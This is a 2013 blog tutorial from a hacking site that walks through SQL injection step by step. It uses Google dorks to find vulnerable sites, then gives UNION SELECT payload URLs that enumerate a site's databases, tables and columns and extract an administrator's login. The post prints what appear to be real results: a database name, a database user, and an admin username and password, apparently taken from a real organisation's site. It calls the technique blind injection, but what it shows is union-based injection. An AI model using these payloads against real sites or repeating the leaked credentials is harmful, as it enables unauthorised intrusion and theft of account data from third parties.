Wednesday, February 27, 2013

Exploiting Web Applications by Manual Blind SQL Injection (Step By Step Tutorial)

Hello Readers, Today I am sharing with you how to exploit web application by Manual Blind SQL Injection Attack. Manual Blind SQL Injection Technique is time taking process.  In My last post we  discussed about SQLInjection Attack. In this post we’ll discuss Blind SQL Injection and how the attack can be carried out. In this post step by step I show you how to find vulnerable point and how to perform manual blind sql injection. First we need to know....



Untitled -



WHAT IS BLIND SQL INJECTION?


When an attacker executes SQL Injection attacks sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather than getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.



* To successfully launch any Blind SQL injection attack, it is of paramount importance to know the exact DBMS that the application is using. Without that piece of information, it is impossible to fine-tune the queries to inject and extract the data we are interested in.


IDENTIFYING THE DATABASE

The Web application technology will give us our first hint. For instance, ASP and
.NET often use Microsoft SQL Server as the back-end database. On the other hand, a PHP application is likely to be using MySQL. If the application is written in Java, it probably talks with an Oracle or a MySQL database.



Step-by-Step tutorial for Blind  SQL Injection                          


Manual Blind SQL Injection Technique is time taking process. First we need vulnerable site to the attack. First we need vulnerable site to the attack. This is the first step in  Blind SQL injection exploitation. After finding vulnerable web application we need to find a Blind SQL injection point in vulnerable web application to exploit this web application. We can add single conation mark in end of the url. If web application
show error than we got right SQL injection point.



[Step – 1] Find  Blind SQL Injection Vulnerable Website


We can find the Vulnerable websites (hackable websites) using Google Dorks. Google Dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork



Download : Google Dorks List



Manual Blind SQL Injection Technique is time taking process. First we find a
Blind SQL injection point in vulnerable web application to exploit this web
application. We can add single conation mark in end of the url. If web application
show error than we got right SQL injection point.

For Example we have a vulnerable web application http://www.victimesite.com
              
         


We find an SQL injection point to exploit this web application.


We add apostrophe [‘] in end of the URL and we got an error.

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right
syntax to use near ''' at line 1

You can see error page in below image.
              




[Step-2] Finding Columns & The Vulnerable Columns


After find error page we need to enumerate the number of columns and those columns that are accepting the queries from us. Refer to the following to checking how many columns there are. (order+by Or order by) the order by function tells the database to order columns by an integer (digit e.g. 1 or 2), no errors returned means the column is there, if there's an error returned the column isn’t there 
 
http://www.victimsite.com/news-and-events.php?id=22 order by 1--

http://www.victimsite.com/news-and-events.php?id=22 order by 2--

http://www.victimsite.com/news-and-events.php?id=22 order by 3--

http://www.victimsite.com/news-and-events.php?id=22 order by 4--

http://www.victimsite.com/news-and-events.php?id=22 order by 5--

http://www.victimsite.com/news-and-events.php?id=22 order by 6--

http://www.victimsite.com/news-and-events.php?id=22 order by 7--

http://www.victimsite.com/news-and-events.php?id=22 order by 8-- >>>>page given error



         
Continue increasing the number after order by till we get an error. So the highest number for which we do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries.    



[Step-3]  Finding Vulnerable Column
 


We now need to find out which of those seven columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. (union+select) Selects all columns provided in the URL and returns the value of the vulnerable column.



Append a 'Union Select' or ‘Union All Select ‘statement to the URL. Also precede the number after "id=" with a hyphen or minus. In above step, we got that the table has 7 columns


http://www.victimsite.com/news-and-events.php?id=22 UNION ALL SELECT 1,2,3,4,5,6,7

Sometimes the page will return and look completely normal, which isn't a problem. Some sites you are required to null the value you're injecting into. In simpler terms, the id =22 we see in the above URL after id must be nulled in order to return with the vulnerable column. So we simply put a hyphen (minus sign) before the 22 like id= -22
So the URL should now look something like this:

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,5,6,7

Result of this query will be the column numbers that are accepting the queries. We get 2,3,5 as the result. Now we'll inject our SQL statements in one of these columns. Look like below image


                         


[Step-3]Enumerating The SQL Or Database Version



We now use a command @@version or version() and in some cases a series of commands to determine what the SQL version is on the current site. Version 4 or version 5. See the example below to view what a URL should look like when the version command has been inserted into the URL replacing the number 5 as 5 is the vulnerable column in the example site.

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,@@version,6,7

If the above fails and the site just return an error or displays normally then we need to use the convert function in order for the server to understand the command, Don’t worry though this is usually the only thing you need to convert and it's on a rare occasion where this is the case.
So, if the example site returned an error we need to replace @@version with the convert()

Function: convert(@@version using latin1)
 
So the example site will now look like this:

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,convert(@@version using latin1),6,7

Now if the page still decides to not return the error then the query must be hexxed: unhex (hex(@@version))

So the example site will now look like this:

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,unhex(hex(@@version)),6,7

Depending on which version the SQL server it is, whether it be 4, or 5 the queries for obtaining data from both versions are different.

We'll get the version of the database in the place where we had got the number 5. See more detail for below image.


        


[Step-4]Exploit To Get List Of Databases



To get the list of databases we add “group_concat(schema_name)” in column number 5 and in end of the url we add from information_schema.schemata-- look like brlow URL.


http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,group_concat(schema_name),6,7 from information_schema.schemata--


Result will display a list of databases on the site. Here on, we'll write the results we have got from our test.

Result: information_schema, nilakantatrust

We can see database names in below image.













[Step-5]To Know Current Database In Use



We use  ‘concat(database())’ in column number 5 to know current database name that in use.



http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,concat(database()),6,7

Result: nilakantatrust

We can see current database name in below image.








[Step-6]Get The Current User

We can use‘concat(user())’ in column number 5 to know user name. It will show only single database name.

http://www.victimesite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,concat(user()),6,7--

Result: rmishra@localhost

We can see user name in below image.














[Step-7] Get The Tables

We can use”group_concat(table_name)” in column number 5 and end of the URL we add “from information_schema.tables where table_schema=database()—“

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=database()--

We get all tables name that use in “nilakantatrust” database.



Result: est_achievement, est_admin,est_adminlog, est_companyrecord, est_facprofile, est_news, est_notice, est_onlineapplication, est_placementrecord

We can see tables name in below image.


  


[Step-8] Get The Columns

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_schema=database()—

Result: ach_id,ach_title, ach_detail, ach_type, ach_date, ach_status, ach_pdf, uid, userid, password, emailid, signature, last_login, uid, ipaddress, act_date, module, action, description, c_snum, c_name, c_photo, fac_snum, fac_name, fac_designation, fac_dept, fac_qualification, fac_email, fac_phone, fac_residence, fac_photo, fac_experience, fac_publication, fac_uid, fac_pwd,news

We can see all columns name in below image.














[Step-9] Extracting Column Data

Suppose we want to extract userid, password. Than we use ”concat(userid,0x3a,password)”  in column number 5 and end of the URL we add “from est_admin”

http://www.vicctimsite.com/news-and-events.php?id=-22 UNION SELECT 1,2,3,4,concat(userid,0x3a,password),6,7 from est_admin

Result: trustadmin:tru$t@9!5!









* In My next post we will discuss about Automated Blind SQL Injection Attack.


If you like this post then kindly Share with your friends and groups and hit like on InvisibleHackers Official or

Connect With us on Facebook.

  Add me in your Google Plus Circles

Thank You For Visiting.....


 
Ankit Bhandari

Written by

Hello, My name is Ankit Bhandari You can visit and Learn Ethical Hacking from my blog. But all these hacking tricks only for educational purpose. Me and My Blog will not responsible for any wrong use of this. Enjoy it but never miss use it.

0 comments:

Post a Comment

 

© 2014 Invisible Hackers. All rights Reserved. Designed by InvisibleHackers